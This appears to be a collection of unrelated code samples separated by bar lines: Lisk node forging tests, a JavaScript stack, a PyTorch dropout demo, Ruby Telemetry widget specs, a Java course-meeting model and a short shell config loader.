// Assert
expect(node['_transactionPool'].stop).toHaveBeenCalled();
expect(node['_synchronizer'].stop).toHaveBeenCalled();
expect(node['_processor'].stop).toHaveBeenCalled();
expect(node['_networkModule'].cleanup).toHaveBeenCalled();
});
});
describe('#_forgingTask', () => {
beforeEach(async () => {
await node.init({
genesisBlockJSON,
dataPath: `/tmp/.lisk/${Date.now()}`,
bus: createMockBus() as any,
channel: stubs.channel,
blockchainDB,
forgerDB,
nodeDB,
logger: stubs.logger,
});
// Default to "delegates enabled, not syncing" so forging proceeds.
jest.spyOn(node['_forger'], 'delegatesEnabled').mockReturnValue(true);
jest.spyOn(node['_forger'], 'forge');
jest.spyOn(node['_synchronizer'], 'isActive', 'get').mockReturnValue(false);
});
it('should halt if no delegates are enabled', async () => {
// Arrange
(node['_forger'].delegatesEnabled as jest.Mock).mockReturnValue(false);
// Act
await node['_forgingTask']();
// Assert
expect(stubs.logger.trace).toHaveBeenNthCalledWith(1, 'No delegates are enabled');
expect(node['_forger'].forge).not.toHaveBeenCalled();
});
it('should halt if the client is not ready to forge (is syncing)', async () => {
// Arrange
jest.spyOn(node['_synchronizer'], 'isActive', 'get').mockReturnValue(true);
// Act
await node['_forgingTask']();
// Assert
expect(stubs.logger.debug).toHaveBeenNthCalledWith(1, 'Client not ready to forge');
expect(node['_forger'].forge).not.toHaveBeenCalled();
});
it('should execute forger.forge otherwise', async () => {
await node['_forgingTask']();
expect(node['_forger'].forge).toHaveBeenCalled();
});
});
describe('#_startForging', () => {
beforeEach(async () => {
await node.init({
genesisBlockJSON,
dataPath: `/tmp/.lisk/${Date.now()}`,
bus: createMockBus() as any,
channel: stubs.channel,
blockchainDB,
forgerDB,
nodeDB,
logger: stubs.logger,
});
jest.spyOn(node['_forger'], 'loadDelegates');
});
it('should load the delegates', async () => {
await node['_startForging']();
expect(node['_forger'].loadDelegates).toHaveBeenCalled();
});
it('should register a task in Jobs Queue named "nextForge" with a designated interval', async () => {
await node['_startForging']();
expect(node['_forgingJob']).not.toBeUndefined();
});
});
});
|
/**
 * Minimal stack factory backed by a plain object keyed by insertion index.
 * Returns an object exposing push(value), pop() and size().
 */
let Stack = function() {
  let someInstance = {};

  // Use an object with numeric keys to store values
  let storage = {};
  let length = 0;

  // Implement the methods below

  // Push a value on top of the stack.
  someInstance.push = function(value) {
    storage[length] = value;
    length++;
  };

  // Remove and return the top value; returns undefined on an empty stack.
  // Fixes two defects of the original: popping an empty stack returned the
  // stale value left at storage[0], and popped slots were never deleted so
  // every popped value stayed reachable (a memory leak).
  someInstance.pop = function() {
    if (length === 0) {
      return undefined;
    }
    length--;
    const value = storage[length];
    delete storage[length];
    return value;
  };

  // Number of values currently on the stack.
  someInstance.size = function() {
    return length;
  };

  return someInstance;
};
|
<reponame>Shuai-Xie/pytorch-examples
import torch
import torch.nn as nn
"""
apply 函数
Function.apply: fowward 前向
Module.apply: apply(fn) 对所有子模块都使用 fn
"""
def turn_on_dropout(module):
    """Switch a dropout module (and only dropout) into training mode.

    Intended to be passed to ``Module.apply`` so dropout keeps sampling at
    inference time (MC-dropout style usage).
    """
    # isinstance (rather than ``type(module) ==``) also matches subclasses of
    # nn.Dropout; siblings such as nn.Dropout2d are still excluded, so the
    # original behavior is preserved for all torch-provided modules.
    if isinstance(module, torch.nn.Dropout):
        module.train()
def turn_off_dropout(module):
    """Switch a dropout module (and only dropout) into eval mode.

    Counterpart of ``turn_on_dropout``; intended for ``Module.apply``.
    """
    # isinstance instead of an exact ``type(module) ==`` check — idiomatic and
    # also covers nn.Dropout subclasses.
    if isinstance(module, torch.nn.Dropout):
        module.eval()
def apply_dropout(model):
    # Put the whole model in eval mode, then walk all submodules and switch
    # just the dropout layers back to train mode so they keep sampling.
    model.eval()
    model.apply(turn_on_dropout)  # dropout stays active even in eval, used for AL (active learning)
def train_eval_dropout():
    """Demonstrate dropout behavior in train vs eval mode.

    Dropout follows the bagging idea:
    bagging:
        train models on bootstrap samples of the data and sum their outputs
        as the final result; the models are independent.
        Reduces variance and overfitting; suited to strong learners such as
        decision trees.
    boosting:
        includes AdaBoost and GBDT.
        Fits a sequence of weak learners in order; based on the previous
        model's predictions, samples are reweighted to emphasize hard ones.

    Scaling at train/test time keeps the expected input/output distribution
    consistent. "Inverted dropout" scales the activations at train time, so
    nothing needs to change at test time.
    Why keep E[x_after_dropout] equal to E[x_before_dropout]?
    Because the dropout output feeds the next layer, whose weights are
    learned from sums of w*x; scaling x up keeps the weights from growing to
    compensate.
    The original dropout formulation did not scale at train time and instead
    shrank the outputs at test time; scaling at train time avoids learning
    overly large weights.
    """
    a = torch.ones(10)
    print(a)
    m = nn.Dropout(p=0.2)
    print(m.training)  # True; modules are in train mode by default
    print(m(a))  # output is scaled by 1 / (1 - p) (inverted dropout)
    m.eval()
    print(m(a))  # all neurons active, no scaling
def diff_drop_drop2d():
    # Contrast element-wise Dropout with channel-wise Dropout2d on a
    # (N=1, C=2, H=4, W=4) tensor of constant values.
    a = torch.ones(1, 2, 4, 4) * 10
    r = 0.5
    print(a)
    print(nn.Dropout(r)(a))  # randomly zeroes roughly half the individual pixels in each feature map
    print(nn.Dropout2d(r)(a))  # zeroes entire feature maps (channels) at once
if __name__ == '__main__':
    # Run the Dropout vs Dropout2d comparison demo.
    diff_drop_drop2d()
|
require 'spec_helper'
# Smoke tests: one `emit` per Telemetry flow/widget type, each with minimal
# valid properties. These hit the API via the gem, so they verify request
# construction/acceptance rather than rendered output.
describe "Flows" do
before(:all) do
# Shared gem configuration for every example in this group.
Telemetry.token = "test-api-token"
Telemetry.logger.level = Logger::DEBUG
end
it "should update a Barchart", flows: true do
properties = {
tag: "test-flow-barchart",
bars: [{value:1000, label:'test', color:'red'}]
}
Telemetry::Barchart.new(properties).emit
end
it "should update a Bulletchart", flows: true do
properties = {
tag: "test-flow-bulletchart",
bulletcharts: [{value: 34, max: 4434}]
}
Telemetry::Bulletchart.new(properties).emit
end
it "should update a Countdown", flows: true do
properties = {
tag: "test-flow-countdown",
time: 1373664109,
message: "Party Time"
}
Telemetry::Countdown.new(properties).emit
end
# NOTE(review): the examples below lack the `flows: true` tag the first
# three carry — confirm whether that filtering is intentional.
it "should update a Gauge" do
properties = {
tag: "test-flow-gauge",
value: 3434
}
Telemetry::Gauge.new(properties).emit
end
it "should update a Graph" do
properties = {
tag: "test-flow-graph",
series: [{values:[4,3,53,3,54,33,21]}]
}
Telemetry::Graph.new(properties).emit
end
it "should update a Icon" do
properties = {
tag: "test-flow-icon",
icons: [{type: "icon-dashboard", label: "Alert", color: "red"}]
}
Telemetry::Icon.new(properties).emit
end
it "should update a Log" do
properties = {
tag: "test-flow-log",
messages: [{timestamp: 1373664109, text: "This is a first message", color: "red"}]
}
Telemetry::Log.new(properties).emit
end
it "should update a Multigauge" do
properties = {
tag: "test-flow-multigauge",
gauges: [{value: 34, label: "Alpha"},{value: 23, label: "Alpha"}]
}
Telemetry::Multigauge.new(properties).emit
end
it "should update a Multivalue" do
properties = {
tag: "test-flow-multivalue",
values: [{value: 34, label: "Alpha"},{value: 344, label: "Bravo"}]
}
Telemetry::Multivalue.new(properties).emit
end
it "should update a Servers" do
properties = {
tag: "test-flow-servers",
servers: [{values: [33,22,55], name: "Alpha"}]
}
Telemetry::Servers.new(properties).emit
end
it "should update a Status" do
properties = {
tag: "test-flow-status",
statuses: [{label: "Alpha", color: "red"}]
}
Telemetry::Status.new(properties).emit
end
it "should update a Table" do
properties = {
tag: "test-flow-table",
table: [["Row1Col1", "Row1Col2", "Row1Col3"]]
}
Telemetry::Table.new(properties).emit
end
it "should update a Text" do
properties = {
tag: "test-flow-text",
text: "testing"
}
Telemetry::Text.new(properties).emit
end
it "should update a Tickertape" do
properties = {
tag: "test-flow-tickertape",
messages: ["Hello World!"]
}
Telemetry::Tickertape.new(properties).emit
end
it "should update a Timeline" do
properties = {
tag: "test-flow-timeline",
messages: [{timestamp: 1373665284, from: "Telemetry", text: "This is the second message"}]
}
Telemetry::Timeline.new(properties).emit
end
it "should update a Timeseries" do
properties = {
tag: "test-flow-timeseries",
values: [33],
interval: "seconds",
interval_count: 60,
series_metadata: [{aggregation: "avg"}]
}
Telemetry::Timeseries.new(properties).emit
end
it "should update a Upstatus" do
properties = {
tag: "test-flow-upstatus",
up: ["www.telemetryapp.com"]
}
Telemetry::Upstatus.new(properties).emit
end
it "should update a Value" do
properties = {
tag: "test-flow-value",
value: 3434
}
Telemetry::Value.new(properties).emit
end
end
|
package models;
import java.util.Date;
import java.util.List;
import scala.Option;
import utils.Utils;
/*
 * @Author(name="<NAME>")
 */
/**
 * Plain data holder describing a single meeting of a course.
 * All fields are public and mutated directly (no accessors); presumably
 * populated by a persistence/JSON mapper — TODO confirm against callers.
 */
public class CourseMeeting {
// Document/record identifier.
public String _id;
// Group number this meeting belongs to.
public int group;
// Where the meeting takes place.
public String place;
// NOTE(review): stored as String rather than Date; the expected format is
// not visible here — confirm before parsing.
public String date;
public String subject;
public String description;
// Lifecycle states a meeting can be in.
public enum meetingStatusEnum {Planned,Done,Cancelled};
public meetingStatusEnum meetingStatus;
// Id of the instructor running the meeting.
public String instructor_id;
// Ids of members recorded as present.
public List<String> presentMembers_ids;
public CourseMeeting() {}
/** @return short human-readable label in the form "place at : date". */
@Override
public String toString() {
return this.place + " at : " + this.date;
}
}
|
# Default directory for VM images; can be overridden in ~/.kivrc below.
VMDIR=${HOME}/virt/vms
# Load per-user overrides if present. Fixes the original's inconsistency of
# testing `~/.kivrc` but sourcing `${HOME}/.kivrc`, and quotes the path so it
# survives a $HOME containing spaces.
if [ -f "${HOME}/.kivrc" ]
then
    source "${HOME}/.kivrc"
fi
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.